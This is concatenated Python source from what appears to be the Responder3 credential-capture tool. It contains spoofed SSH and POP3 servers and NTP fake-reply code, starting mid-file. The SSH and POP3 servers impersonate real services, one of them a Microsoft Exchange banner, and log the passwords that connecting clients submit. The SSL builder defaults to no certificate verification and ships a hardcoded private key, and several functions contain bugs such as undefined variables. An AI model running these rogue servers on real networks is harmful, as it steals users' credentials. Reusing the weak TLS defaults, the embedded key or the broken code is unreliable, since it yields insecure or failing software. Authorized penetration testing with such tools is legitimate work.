			self.session.client_banner = client_banner.decode().strip()
			#print(self.session.client_banner)
			
			#send server banner
			self.cwriter.write(self.session.server_banner.encode()+b'\r\n')
			await self.cwriter.drain()
			
			return 'OK'
			
		except Exception as e:
			print(e)
			return 'NO'
		
	@r3trafficlogexception	
	async def key_exchange(self, msg, timeout = 1):
			cipher = SSHCipher(self.privkey_file)
			self.session.client_kxinit = msg.payload.raw

			##############################################
			packet = SSHPacket()
			packet.payload = cipher.generate_server_key_rply()
			packet_data = packet.to_bytes()
			self.session.server_kxinit = packet.payload.to_bytes()
			############################################

			await self.send_packet(packet.payload)
			
			msg = await asyncio.wait_for(self.session.parser.from_streamreader(self.creader), timeout = 20)
			#print(str(msg))
			
			payload = cipher.calculate_kex(self.session.client_banner.encode(), self.session.server_banner.encode(), self.session.client_kxinit, self.session.server_kxinit, msg.payload)
			
			await self.send_packet(payload)
			await self.send_packet(SSH_MSG_NEWKEYS())
			
			return cipher
		
	@r3trafficlogexception
	async def run(self):
		while not self.shutdown_evt.is_set():
			if self.session.state == 'BANNER':
				status = await self.banner_exchange()
				#print(status)
				if status == 'OK':
					self.session.state = 'KEX'
					continue
				raise Exception('Banner exchange failed!')

			try:
				result = await asyncio.gather(*[asyncio.wait_for(self.session.parser.from_streamreader(self.creader, cipher = self.session.cipher, sequence_number = self.session.get_seq_no()), timeout=None)], return_exceptions=True)
			except asyncio.CancelledError as e:
				raise e
			if isinstance(result[0], R3ConnectionClosed):
				return
			elif isinstance(result[0], Exception):
				raise result[0]
			else:
				msg = result[0]
					
			if isinstance(msg.payload, SSH_MSG_DISCONNECT):
				await self.logger.debug('Client gracefully disconnects (SSH_MSG_DISCONNECT)')
				return

			if isinstance(msg.payload, SSH_MSG_IGNORE):
				##############################################################
				### MASSIVE TODO! This is a bad solution here, but I'ts late at night :(
				#### Problem: apparently there are 2 sequence numbers, one for server and one for client
				#### the current implementation only uses one, therefore we send one ignore back to keep sync
				#### but this is a bad "solution"
				#### TODO: impelemtn separate server and client sequence counter for communication!
				payload = SSH_MSG_IGNORE()
				payload.data = b'\x00'
				await self.send_enc_packet(payload)
				##############################################################
				continue
			
					
			if self.session.state == 'KEX':
				#print('KEX')
				cipher = await self.key_exchange(msg)
				self.session.state = 'EXPECT_NEWKEYS'
				continue

			elif self.session.state == 'EXPECT_NEWKEYS':
				if not isinstance(msg.payload, SSH_MSG_NEWKEYS):
					raise Exception('Expected NEWKEYS, got %s' % type(msg.payload))

				self.session.cipher = cipher
				self.session.state = 'AUTHENTICATION'
				continue

			elif self.session.state == 'AUTHENTICATION':
				#here should be the atuhentication part
				#print('AUTHENTICATION')
				if isinstance(msg.payload, SSH_MSG_USERAUTH_REQUEST):
					#print('SSH_MSG_USERAUTH_REQUEST')
					#print(msg.payload)

					if msg.payload.method_name.lower() == 'password':
						cred = Credential(
									credtype = 'PLAIN',
									username = msg.payload.user_name, 
									password = msg.payload.method.password,
									fullhash='%s:%s' % (msg.payload.user_name, msg.payload.method.password)		
								)
						await self.logger.credential(cred)
						payload = SSH_MSG_USERAUTH_FAILURE()
						payload.authentications = ['password']
						payload.partial_success = False
						await self.send_enc_packet(payload)
						continue

					if msg.payload.method_name.lower() == 'none':
						payload = SSH_MSG_USERAUTH_FAILURE()
						payload.authentications = ['password']
						payload.partial_success = False
						await self.send_enc_packet(payload)
						continue

					else:
						payload = SSH_MSG_USERAUTH_FAILURE()
						payload.authentications = ['password']
						payload.partial_success = False
						await self.send_enc_packet(payload)
						continue
				else:
					if msg.payload.service_name == 'ssh-userauth':
						p = SSH_MSG_SERVICE_ACCEPT()
						p.service_name = msg.payload.service_name
						await self.send_enc_packet(p)
						
						continue
					else:
						raise Exception('Not supported service! %s' % msg.payload.service_name)
						break
					


#https://tools.ietf.org/html/rfc5905
import io
import enum
import math
import random
import datetime
import ipaddress

"""
DISCLAIMER: DO NOT USE IT FOR MISSION-CRITICAL ENVIRONMENTS OR YOU WILL BE POTATO
SERIOUSLY!!!!! THE PRECISION IS BASED ON FLOATS FOR DATETIME, THE LOGARITHMICAL 
CALCULATIONS COULD YIELD SMALL ERRORS IN UNEXPECTED WAYS. NOT TO MENTION MY IDEAS OF PRECISION
"""

NTPEpoch = datetime.datetime(1900,1,1)

NTPStratumReferenceClock = {
	'GOES' : 'Geosynchronous Orbit Environment Satellite',
	'GPS'  : 'Global Position System',
	'GAL'  : 'Galileo Positioning System',
	'PPS'  : 'Generic pulse-per-second',
	'IRIG' : 'Inter-Range Instrumentation Group',                 
	'WWVB' : 'LF Radio WWVB Ft. Collins, CO 60 kHz',              
	'DCF'  : 'LF Radio DCF77 Mainflingen, DE 77.5 kHz',           
	'HBG'  : 'LF Radio HBG Prangins, HB 75 kHz',                  
	'MSF'  : 'LF Radio MSF Anthorn, UK 60 kHz',                   
	'JJY'  : 'LF Radio JJY Fukushima, JP 40 kHz, Saga, JP 60 kHz',
	'LORC' : 'MF Radio LORAN C station, 100 kHz',                 
	'TDF'  : 'MF Radio Allouis, FR 162 kHz',                      
	'CHU'  : 'HF Radio CHU Ottawa, Ontario',                      
	'WWV'  : 'HF Radio WWV Ft. Collins, CO',                      
	'WWVH' : 'HF Radio WWVH Kauai, HI',                           
	'NIST' : 'NIST telephone modem',                              
	'ACTS' : 'NIST telephone modem',                              
	'USNO' : 'USNO telephone modem',                              
	'PTB'  : 'European telephone modem',      
}

class NTPProtocolType(enum.Enum):
	TCP = enum.auto()
	UDP = enum.auto()

class NTPLeapIndicator(enum.Enum):
	NO_WARNING = 0
	LAST_61    = 1
	LAST_59    = 2
	UNKNOWN    = 3

class NTPMode(enum.Enum):
	RESERVED = 0
	SYMMETRIC_ACTIVE = 1
	SYMMETRIC_PASSIVE = 2
	CLIENT = 3
	SERVER = 4
	BROADCAST = 5
	NTP_CONTROL_MESSAGE = 6
	RESERVED_2 = 7

class NTPStratum(enum.Enum):
	UNSPECIFIED = 0
	PRIMARY_SERVER = 1
	SECONDARY_SERVER    = 2
	SECONDARY_SERVER_1  = 3
	SECONDARY_SERVER_2  = 4
	SECONDARY_SERVER_3  = 5
	SECONDARY_SERVER_4  = 6
	SECONDARY_SERVER_5  = 7
	SECONDARY_SERVER_6  = 8
	SECONDARY_SERVER_7  = 9
	SECONDARY_SERVER_8  = 10
	SECONDARY_SERVER_9  = 11
	SECONDARY_SERVER_10 = 12
	SECONDARY_SERVER_11 = 13
	SECONDARY_SERVER_12 = 14
	SECONDARY_SERVER_13 = 15
	UNSYNCHRONIZED = 16
	#reserved 17-255
	RESERVED = 17

class NTPShort():
	def __init__(self):
		self.Seconds  = None
		self.Fraction = None

	def from_bytes(bbuff):
		return NTPShort.from_buffer(io.BytesIO(bbuff))
	
	def from_buffer(buff):
		s = NTPShort()
		s.Seconds  = int.from_bytes(buff.read(2), byteorder='big', signed = False)
		s.Fraction = int.from_bytes(buff.read(2), byteorder='big', signed = False)
		return s

	def to_bytes(self):
		t  = self.Seconds.to_bytes(2, byteorder = 'big', signed = False)
		t += self.Fraction.to_bytes(2, byteorder = 'big', signed = False)
		return t

	def from_float(f):
		frac, tot = math.modf(f)
		s = NTPShort()
		s.Seconds = int(tot)
		fs, ts = math.modf(frac*(2**16))
		s.Fraction = int(ts)
		return s

	def total(self):
		return float(self.Seconds) + float(self.Fraction / 2**16 )

class NTPTimeStamp():
	def __init__(self):
		self.Seconds  = None
		self.Fraction = None

	def from_bytes(bbuff):
		return NTPTimeStamp.from_buffer(io.BytesIO(bbuff))
	def from_buffer(buff):
		s = NTPTimeStamp()
		s.Seconds = int.from_bytes(buff.read(4), byteorder='big', signed = False)
		s.Fraction = int.from_bytes(buff.read(4), byteorder='big', signed = False)
		return s

	def to_bytes(self):
		t  = self.Seconds.to_bytes(4, byteorder = 'big', signed = False)
		t += self.Fraction.to_bytes(4, byteorder = 'big', signed = False)
		return t


	def fromDatetime(dt):
		t = (dt - NTPEpoch).total_seconds()
		frac, tot = math.modf(t)
		s = NTPTimeStamp()
		s.Seconds = int(tot)
		fs, ts = math.modf(frac*(2**32))
		s.Fraction = int(ts)
		return s

	def total(self):
		return float(self.Seconds) + float(self.Fraction / 2**32 )

	def toDatetime(self):
		return NTPEpoch + datetime.timedelta(seconds = self.Seconds, microseconds = self.Fraction/1000000)

class NTPPacket():
	def __init__(self, protocolType = NTPProtocolType.UDP, ipType = ipaddress.IPv4Address('0.0.0.0')):
		self.protocolType = protocolType
		self.ipType = ipType
		self.LI = None
		self.VN = None
		self.Mode = None
		self.Stratum = None
		self.Poll = None
		self.Precision = None
		self.RootDelay = None
		self.RootDispersion = None
		self.ReferenceID = None
		self.ReferenceTimestamp = None
		self.OriginTimestamp = None
		self.ReceiveTimestamp = None
		self.TransmitTimestamp = None
		self.ExtensionFields = None
		self.KeyIdentifier = None
		self.digest = None
		
	async def from_streamreader(reader):
		data = await reader.read()
		return NTPPacket.from_bytes(data)

	def from_bytes(bbuff, protocolType = NTPProtocolType.UDP):
		return NTPPacket.from_buffer(io.BytesIO(bbuff), protocolType)
	
	def from_buffer(buff, protocolType = NTPProtocolType.UDP):
		ntp = NTPPacket(protocolType)
		t = int.from_bytes(buff.read(1), byteorder='big', signed = False)
		ntp.LI = NTPLeapIndicator((t & 0xc0) >> 6)
		ntp.VN = (t & 0x38) >> 3
		ntp.Mode = NTPMode((t & 0x7))
		ntp.Stratum = NTPStratum( int.from_bytes(buff.read(1), byteorder='big', signed = False))
		ntp.Poll = 2**(int.from_bytes(buff.read(1), byteorder='big', signed = True)) 
		ntp.Precision = 2**(int.from_bytes(buff.read(1), byteorder='big', signed = True)) 
		ntp.RootDelay = NTPShort.from_buffer(buff)
		ntp.RootDispersion = NTPShort.from_buffer(buff)
		if ntp.Stratum == NTPStratum.UNSPECIFIED:
			ntp.ReferenceID = buff.read(4).decode()
		elif ntp.Stratum == NTPStratum.PRIMARY_SERVER:
			ntp.ReferenceID = buff.read(4).decode()
		elif ntp.Stratum.value in range(2,16):
			if isinstance(ntp.ipType, ipaddress.IPv4Address):
				ntp.ReferenceID = ipaddress.IPv4Address(buff.read(4))
			else:
				#this case it's IPv6, but since IPv6 bytes are larger
				#the standard comes up with MD5(IPv6)[:4]
				ntp.ReferenceID = buff.read(4)
		else:
			ntp.ReferenceID = buff.read(4)


		ntp.ReferenceTimestamp = NTPTimeStamp.from_buffer(buff)
		ntp.OriginTimestamp = NTPTimeStamp.from_buffer(buff)
		ntp.ReceiveTimestamp = NTPTimeStamp.from_buffer(buff)
		ntp.TransmitTimestamp = NTPTimeStamp.from_buffer(buff)
		#extensions here!
		#self.KeyIdentifier = buff.read(4)
		#self.digest = buff.read(4)

		return ntp

	def construct_fake_reply(originTS, dt, ip, protocolType = NTPProtocolType.UDP):
		ntp = NTPPacket(protocolType)
		ntp.LI = NTPLeapIndicator.NO_WARNING
		ntp.VN = 4
		ntp.Mode = NTPMode.SERVER
		ntp.Stratum = NTPStratum.SECONDARY_SERVER
		ntp.Poll = 4
		ntp.Precision = 0.00000001
		ntp.RootDelay = NTPShort.from_float(random.uniform(0.0200, 0.0100))
		ntp.RootDispersion = NTPShort.from_float(random.uniform(0.0500, 0.0100))
		ntp.ReferenceID = ip
		ntp.ReferenceTimestamp = NTPTimeStamp.fromDatetime(dt)
		ntp.OriginTimestamp = originTS
		ntp.ReceiveTimestamp = NTPTimeStamp.fromDatetime(dt)
		ntp.TransmitTimestamp = NTPTimeStamp.fromDatetime(dt)

		return ntp

	def to_bytes(self):
		temp  = self.LI.value << 6
		temp |= self.VN << 3
		temp |= self.Mode.value

		t  = temp.to_bytes(1, byteorder = 'big', signed = False)
		t += self.Stratum.value.to_bytes(1, byteorder = 'big', signed = False)
		t += int(math.log2(self.Poll)).to_bytes(1, byteorder = 'big', signed = True)
		t += int(math.log2(self.Precision)).to_bytes(1, byteorder = 'big', signed = True)
		t += self.RootDelay.to_bytes()
		t += self.RootDispersion.to_bytes()
		
		if self.Stratum == NTPStratum.UNSPECIFIED:
			t += self.ReferenceID.encode()
		elif self.Stratum == NTPStratum.PRIMARY_SERVER:
			t += self.ReferenceID.encode()
		elif self.Stratum.value in range(2,16):
			if isinstance(self.ipType, ipaddress.IPv4Address):
				t += self.ReferenceID.packed
			else:
				t += self.ReferenceID 
		else:
			t += self.ReferenceID 

		t += self.ReferenceTimestamp.to_bytes()
		t += self.OriginTimestamp.to_bytes()
		t += self.ReceiveTimestamp.to_bytes()
		t += self.TransmitTimestamp.to_bytes()

		return t

	def __repr__(self):
		t  = '== NTP Packet ==\r\n'
		t += 'LI : %s\r\n' % repr(self.LI)
		t += 'VN : %d\r\n' % self.VN
		t += 'Mode : %s\r\n' % repr(self.Mode)
		t += 'Stratum : %s\r\n' % repr(self.Stratum)
		t += 'Poll : %f\r\n' % self.Poll
		t += 'Precision : %f\r\n' % self.Precision
		t += 'RootDelay : %s\r\n' % str(self.RootDelay.total())
		t += 'RootDispersion : %s\r\n' % str(self.RootDispersion.total())
		if self.Stratum == NTPStratum.PRIMARY_SERVER:
			t += NTPStratumReferenceClock[self.ReferenceID.strip()]
		else:
			t += 'ReferenceID : %s\r\n' % repr(self.ReferenceID)
		t += 'ReferenceTimestamp : %s\r\n' % self.ReferenceTimestamp.toDatetime().isoformat()
		t += 'OriginTimestamp : %s\r\n' % self.OriginTimestamp.toDatetime().isoformat()
		t += 'ReceiveTimestamp : %s\r\n' % self.ReceiveTimestamp.toDatetime().isoformat()
		t += 'TransmitTimestamp : %s\r\n' % self.TransmitTimestamp.toDatetime().isoformat()

		return t



import os
import ssl
from ssl import VerifyMode
import tempfile
from pathlib import Path


class SSLContextBuilder:
	doc_sslsettings = {
		'protocols':'',
		'options':'',
		'verify_mode':'',
		'ciphers':'',
		'server_side':'',
		'certfile':'',
		'keyfile':'',
		'certdata':'',
		'keydata':'',
	}
	"""
	Holds the necessary config elements to setup an ssl context.
	certfile and certdata are mutually exclusive. Only provide one.
	:param protocols: List of ssl.protocol values as string
	:type protocols: list
	:param options: List of ssl.options values as string
	:type protocols: list
	:param verify_mode: The verification mode as string
	:type verify_mode: str
	:param ciphers: Cipher settings string
	:type ciphers: str
	:param server_side: Determines whether we use this context as a client or as a server
	:type server_side: bool
	:param certfile: Full path to the certificate file
	:type certfile: str
	:param keyfile: Full path to the key file
	:type keyfile: str
	:param certdata: PEM formatted string holding the certificate
	:type certdata: key
	:param keydata: PEM formatted string holding the key data
	:type keydata: str
	"""

	def __init__(self):
		"""
		Parses the user-supplied setting and create an ssl.SSLContext class
		"""
		pass

	@staticmethod
	def load_certificates(context, sslsettings):
		#or 'certfile' in sslsettings or 'certdata' in sslsettings:
		if 'certfile' in sslsettings:
			print('loading certfile!')
			context.load_cert_chain(
				certfile=sslsettings['certfile'],
				keyfile=sslsettings['keyfile']
			)
		if 'certdata' in sslsettings:
			# not using tempfile.NamedTemporaryFile here because it cannot be re-opened in windows as per documentation
			with tempfile.TemporaryDirectory() as td:
				random_suffix = os.urandom(8).hex()
				certfile = '%s%s%s' % ('cert', random_suffix, '.crt')
				certfile_path = str(Path(td, certfile))
				#print(certfile_path)
				keyfile = '%s%s%s' % ('key', random_suffix, '.crt')
				keyfile_path = str(Path(td, keyfile))
				#print(keyfile_path)
				with open(certfile_path, 'w') as f:
					f.write(sslsettings['certdata'])
					f.flush()
					os.fsync(f.fileno())

				with open(keyfile_path, 'w') as f:
					f.write(sslsettings['keydata'])
					f.flush()
					os.fsync(f.fileno())

				context.load_cert_chain(
					certfile=certfile_path,
					keyfile=keyfile_path
				)

	@staticmethod
	def load_ca_certs(context, sslsettings):
		if 'cafile' in sslsettings:
			context.load_verify_locations(sslsettings['cafile'])
		elif 'cadata' in sslsettings:
			with tempfile.TemporaryDirectory() as td:
				random_suffix = os.urandom(8).hex()
				cafile = '%s%s%s' % ('cert', random_suffix, '.crt')
				cafile_path = str(Path(td, cafile))
				#print(certfile_path)
						
				with open(certfile_path, 'w') as f:
					f.write(sslsettings['cadata'])
					f.flush()
					os.fsync(f.fileno())
							
				context.load_verify_locations(
					certfile_path
				)
				
		else:
			raise Exception('Verify mode of %s needs "cafile " or "cadata" to be set in the settings!' % verify_mode)

	@staticmethod
	def from_dict(sslsettings, server_side=False):
		"""
		Creates SSL context from dictionary-based configuration
		:param sslsettings: configuration dictionary
		:param server_side: decides that the context will be created as a server or client
		:return: ssl.SSLContext

		:TODO: if python devs come up with a way to load certificates/key from string rather than from a file then rewrite the certdata part
		"""
		protocol = ssl.PROTOCOL_SSLv23
		options = []
		verify_mode = ssl.CERT_NONE
		ciphers = 'ALL'
		check_hostname = None

		if 'protocol' in sslsettings:
			"""
			protocols = []
			if isinstance(sslsettings['protocols'], list):
				for proto in sslsettings['protocols']:
					protocols.append(getattr(ssl, proto, 0))
			else:
				protocols.append(getattr(ssl, sslsettings['protocols'], 0))
			"""
			protocol = getattr(ssl, sslsettings['protocol'])

		if 'options' in sslsettings:
			options = []
			if isinstance(sslsettings['options'], list):
				for option in sslsettings['options']:
					options.append(getattr(ssl, proto, 0))
			else:
				options.append(getattr(ssl, sslsettings['options'], 0))

		if 'verify_mode' in sslsettings:
			verify_mode = getattr(ssl, sslsettings['verify_mode'], 0)

		if 'ciphers' in sslsettings:
			ciphers = sslsettings['ciphers']

		if 'server_side' in sslsettings:
			server_side = sslsettings['server_side']
				
		if server_side == False:
			check_hostname = True #hey! security first! (or something)
			if 'check_hostname' in sslsettings:
				check_hostname = sslsettings['check_hostname']
			
			

		context = ssl.SSLContext(protocol)
		context.verify_mode = verify_mode
		
		if check_hostname:
			context.check_hostname = check_hostname

		# server_side>you need certs, if you are a client, you might need certs
		if server_side == True:
			SSLContextBuilder.load_certificates(context, sslsettings)
			if verify_mode != VerifyMode.CERT_NONE:
				SSLContextBuilder.load_ca_certs(context, sslsettings)
		else:
			if verify_mode != VerifyMode.CERT_NONE:
				SSLContextBuilder.load_certificates(context, sslsettings)
				SSLContextBuilder.load_ca_certs(context, sslsettings)
			else:
				SSLContextBuilder.load_ca_certs(context, sslsettings)

		#context.protocol = 0
		context.options = 0
		#for p in protocols:
		#	context.protocol |= p
		for o in options:
			context.options |= o
		context.set_ciphers(ciphers)
		return context

def get_default_server_ctx():
	d = {
			'protocols'  : 'PROTOCOL_SSLv23',
			'options'    : 'OP_CIPHER_SERVER_PREFERENCE',
			'verify_mode': 'CERT_NONE',
			'ciphers'    : 'ALL',
			'server_side': True,
			'certdata'   : '-----BEGIN CERTIFICATE-----\r\n'\
							'MIIDEzCCAfugAwIBAgIBAjANBgkqhkiG9w0BAQsFADATMREwDwYDVQQDEwhyM3Rl\r\n'\
							'c3RDQTAeFw0xODExMDEyMDM3MDBaFw0yODExMDEyMDM3MDBaMBYxFDASBgNVBAMM\r\n'\
							'C3Rlc3Rfc2VydmVyMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAtd1A\r\n'\
							'TN7yDtJH5h1PHDOjBSZzd4PO1/EL35UyeRJ7uwUk6NyCgiwUicr+sMEVqKkiAaNN\r\n'\
							'xbhGiJv9+uWtJWkSyhpBb2kDlXq/aBA1aAJ1U7y1CAK6QOTrxO9+ugLJuILsY5i/\r\n'\
							'N4GERITeJgCwRdDaOCR3EzeG8mt+znQNwE3vdD3DCpNGSDMenyCF/STjBcpdXABF\r\n'\
							'1CNeSnzEZUZ5enp2yg2oCTCbgN8yuTftM04gWyhojeYXitRJRYAE7INNqYGPyg73\r\n'\
							'mXY4rN6mIgeVIhaWSYxpjp6g7LXOr0xNsBnt2pctf9zpYbq40HxI4SNBqB/9lwXV\r\n'\
							'7PPC2cuWg2QEuCZANQIDAQABo28wbTAMBgNVHRMBAf8EAjAAMB0GA1UdDgQWBBTv\r\n'\
							'Wx/+SvpZgV8dyYVoGZ3norTwWzALBgNVHQ8EBAMCBeAwEQYJYIZIAYb4QgEBBAQD\r\n'\
							'AgZAMB4GCWCGSAGG+EIBDQQRFg94Y2EgY2VydGlmaWNhdGUwDQYJKoZIhvcNAQEL\r\n'\
							'BQADggEBAGB56E1cfRmoum67ska+3qo4xM41uU40rm+VnGQpcBhloNEZ8fGL/vB6\r\n'\
							'0eJXsGe2uju49QfXccIV7JEawOauifc7cYYMNGKDCcPAXa3FXsCzRkkw+hO8l5zK\r\n'\
							'qgtbcqy+ov0I2bn09iM3CdB9ZhyISPBcPTtGFQjRJSX2NXQbfOTlz5CWyqb8bR/g\r\n'\
							'QqF1upvc0xzjJRjg/5VSxBdsBwqbH80vyiFBP9C919IfpUm+HDLe4Gps5NV5w+VT\r\n'\
							'GVC3WHkWU5PUUbwaD0b1O32rYiihYrPLYWFLqDPzhWPTZjpBr/Ehu/WbGVtSQmFv\r\n'\
							'g1T4Y9c1mGDYzyOy2/zeQWpWGZ0VnaE=\r\n'\
							'-----END CERTIFICATE-----\r\n',
			'keydata'    :  '-----BEGIN RSA PRIVATE KEY-----\r\n'\
							'MIIEowIBAAKCAQEAtd1ATN7yDtJH5h1PHDOjBSZzd4PO1/EL35UyeRJ7uwUk6NyC\r\n'\
							'giwUicr+sMEVqKkiAaNNxbhGiJv9+uWtJWkSyhpBb2kDlXq/aBA1aAJ1U7y1CAK6\r\n'\
							'QOTrxO9+ugLJuILsY5i/N4GERITeJgCwRdDaOCR3EzeG8mt+znQNwE3vdD3DCpNG\r\n'\
							'SDMenyCF/STjBcpdXABF1CNeSnzEZUZ5enp2yg2oCTCbgN8yuTftM04gWyhojeYX\r\n'\
							'itRJRYAE7INNqYGPyg73mXY4rN6mIgeVIhaWSYxpjp6g7LXOr0xNsBnt2pctf9zp\r\n'\
							'Ybq40HxI4SNBqB/9lwXV7PPC2cuWg2QEuCZANQIDAQABAoIBAGLA4MCdM22u69Hd\r\n'\
							'ym5y76vFRF/6l+AUiTEAcCbkTYGxemhkDQ4oZ4KnUwOh5WPva4LeLUYXGV3m7tRF\r\n'\
							'0W6GDujltvCLYqHRxIv6eTWgWBt/VgIikQbaB9ipf/P7vZPOrBQtBnBaiPs39vVF\r\n'\
							'3HIcxdJEotAxj7qlenca97ib2VIRqGKI4xr36UdYs3XW2Ip1zatZPLTMBVroyLpY\r\n'\
							'f9ytiXz7QlQH5mBE99oIksKrAz/z38zXZ18yIZJQRwnbC/nOapEeokMpRu61opEl\r\n'\
							'e50K/qIKhrdGJJ+20BLIAa05W8jRC8ezZ7Hb+5XI4bl5HJF8IpVMqi1ZVLssQo3F\r\n'\
							'S1N9egECgYEA6syeCP/b5hbV6z28SH4lT7fXAaakxxUt0otzt0lV2wUvsfvF3S9p\r\n'\
							'WV4OYKvJrSapbzsGLseSjQE8ho9OIxpscPX4iqALhnbnY21DeSMY/zigLHPHX0mP\r\n'\
							'SDInlfI+W+LapnHNU6ofZA5K+tN5WWAzskXmC5G3TPsGIv6A1YOANLUCgYEAxkkK\r\n'\
							'mZIgMA5yGyv8t8jAe1B6cF40X2+77lM220ZgMTLfvFmjnQgypwPXxez4jHoAAgth\r\n'\
							'/1ivxV7fvny6xl/J6IM8orKmKk8GQAganyzq50KxxxoSd8yasmqGlXoHVDsMbEoK\r\n'\
							'RBFI9BtEn5OJ2impWYdE12mpt4IumkVgOw/0jYECgYEAqSr3ieBeHO7C/ZQjPc+1\r\n'\
							'LjR0MnpQKie2NgXHP30U4JJiBMgzjOMF8h90GG5tBdXfKYbLM5USn4kOhJxnXZ9C\r\n'\
							'FjkB807QPvcYS2iDvpls/yVbMevQ73ReSVPpdX1tNGLDyjwgBXGC4GHz37fRrHVF\r\n'\
							'ieIWlqtL96i8iSX4yNzP2CkCgYBca+Ev8YdlPuZ6uccCluT41WssgwxgS4FKNalF\r\n'\
							'DYl6hR75+MIlSJPrewQQ8kJrn9XvHgUgcuMC2RTrAdJA8pb29GzH3QNMhyb/o4dd\r\n'\
							'GB+piVG53vIqusiETtjKRWWzIg7JTr14OqJJfYg/5RIFCRQxcbZpvYtoyJoWOC4B\r\n'\
							'eY9ggQKBgDEMW8ZkNFgXpj+j7zxGpp/TQUtM4LL/uGa4Du3Wicz7T/Ho6lmVkLCZ\r\n'\
							'GWQrsJZjqI512qFKDTVWX7nOap+oGqGBF4VnefvO9RVoB6wVqb3FpZRx8elUyPXN\r\n'\
							'oChY/SCgtGktqGgtcHYiFXVUqHW8cHTk9Sb0YL4T8xLMrab2j13C\r\n'\
							'-----END RSA PRIVATE KEY-----\r\n',
			
		}
	return SSLContextBuilder.from_dict(d)



import logging
import asyncio

from responder3.core.logging.logger import *
from responder3.core.asyncio_helpers import R3ConnectionClosed
from responder3.core.commons import *
from responder3.protocols.POP3 import *
from responder3.core.servertemplate import ResponderServer, ResponderServerSession
from responder3.core.ssl import *


class POP3Session(ResponderServerSession):
	def __init__(self, connection, log_queue):
		ResponderServerSession.__init__(self, connection, log_queue, self.__class__.__name__)
		self.encoding = 'ascii'
		self.parser = POP3CommandParser(encoding=self.encoding)
		self.authhandler = None
		self.supported_auth_types = [POP3AuthMethod.PLAIN, POP3AuthMethod.APOP, POP3AuthMethod.AUTH]
		self.creds = {}
		self.salt = None
		self.current_state = POP3State.AUTHORIZATION
		#self.log_data = False
		self.banner = None

	def __repr__(self):
		t = '== POP3 Session ==\r\n'
		t += 'encoding:      %s\r\n' % repr(self.encoding)
		t += 'parser: %s\r\n' % repr(self.parser)
		t += 'current_state: %s\r\n' % repr(self.current_state)
		t += 'authhandler: %s\r\n' % repr(self.authhandler)
		return t


class POP3(ResponderServer):
	def init(self):
		if self.settings:
			self.parse_settings()
			return
		self.set_default_settings()

	def set_default_settings(self):
		self.session.banner = 'Microsoft Exchange 2003 POP3 server version 6.0.4417.0 (bocisajt.com) ready.'
		self.session.ssl_ctx = get_default_server_ctx()
		self.session.salt = '<1896.697170952@dbc.mtview.ca.us>'

	def parse_settings(self):
		if 'banner' in self.settings:
			self.session.banner = self.settings['banner']
		if 'ssl_ctx' in self.settings:
			self.session.ssl_ctx = SSLContextBuilder.from_dict(self.settings['ssl_ctx'])
		if 'salt' in self.settings:
			self.session.salt = self.settings['salt']


	async def send_data(self, data):
		self.cwriter.write(data)
		await self.cwriter.drain()

	@r3trafficlogexception
	async def run(self):
		# send hello
		await asyncio.wait_for(
			self.send_data(
				POP3OKResp.construct(
					'%s %s' % (self.session.banner, self.session.salt)).to_bytes()
				),
				timeout=1
		)

		# main loop
		while not self.shutdown_evt.is_set():
			try:
				result = await asyncio.gather(*[asyncio.wait_for(self.session.parser.from_streamreader(self.creader), timeout=None)], return_exceptions=True)
			except asyncio.CancelledError as e:
				raise e
			if isinstance(result[0], R3ConnectionClosed):
				return
			elif isinstance(result[0], Exception):
				raise result[0]
			else:
				cmd = result[0]
				
			if 'R3DEEPDEBUG' in os.environ:
				await self.log(cmd, logging.DEBUG)
				await self.log(self.session.current_state, logging.DEBUG)

			if self.session.current_state == POP3State.AUTHORIZATION:
				if cmd.command in POP3AuthorizationStateCommands:
					capas = ['Capability list follows','STLS', 'USER','.']
					if cmd.command == POP3Command.CAPA:
						await asyncio.wait_for(
							self.send_data(POP3OKResp.construct('\r\n'.join(capas)).to_bytes()),
							timeout=1)
						continue
					
					elif cmd.command == POP3Command.QUIT:
						await asyncio.wait_for(
							self.send_data(POP3OKResp.construct('').to_bytes()),
							timeout=1)
						return

					elif cmd.command == POP3Command.STLS:
						self.cwriter.pause_reading()
						await asyncio.wait_for(
							self.send_data(POP3OKResp.construct('Begin TLS negotiation').to_bytes()),
							timeout=1)
						await self.switch_ssl(self.session.ssl_ctx)
						continue
					
					else:
						if self.session.authhandler is None:
							if cmd.command in [POP3Command.USER, POP3Command.PASS]:
								self.session.authhandler = POP3AuthHandler(POP3AuthMethod.PLAIN, self.session.creds, self.session.salt)
							elif cmd.command == POP3Command.APOP and POP3AuthMethod.APOP in self.session.supported_auth_types:
								self.session.authhandler = POP3AuthHandler(POP3AuthMethod.APOP, self.session.creds, self.session.salt)
							elif cmd.command == POP3Command.AUTH and POP3AuthMethod.AUTH in self.session.supported_auth_types:
								self.session.authhandler = POP3AuthHandler(POP3AuthMethod.AUTH, self.session.creds)
							else:
								raise Exception('Auth type not supported!')

						res, data = self.session.authhandler.do_AUTH(cmd)
						
						if res == POP3AuthStatus.MORE_DATA_NEEDED:
							await asyncio.wait_for(
								self.send_data(data),
								timeout=1)
							continue
						
						elif res == POP3AuthStatus.NO:
							await self.logger.credential(data)
							await asyncio.wait_for(
								self.send_data(POP3ERRResp.construct('').to_bytes()),
								timeout=1)
							return
						elif res == POP3AuthStatus.OK:
							await self.logger.credential(data)
							await asyncio.wait_for(
								self.send_data(POP3OKResp.construct('User has no new messages').to_bytes()),
								timeout=1)
							self.session.current_state = POP3State.TRANSACTION
							continue
				else:
					raise Exception('Wrong POP3 command received for AUTHORIZATION state! Command: %s' % cmd.command)
		
			elif self.session.current_state == POP3State.TRANSACTION:
				if cmd.command in POP3TransactionStateCommands:
					raise NotImplementedError
				else:
					raise Exception('Wrong POP3 command received for TRANSACTION state!Command: %s' % cmd.command)

			elif self.session.current_state == POP3State.UPDATE:
				if cmd.command in POP3UpdateStateCommands:
					# be careful QUIT has a different meaning here!
					raise NotImplementedError
				else:
					raise Exception('Wrong POP3 command received for UPDATE state! Command: %s' % cmd.command)

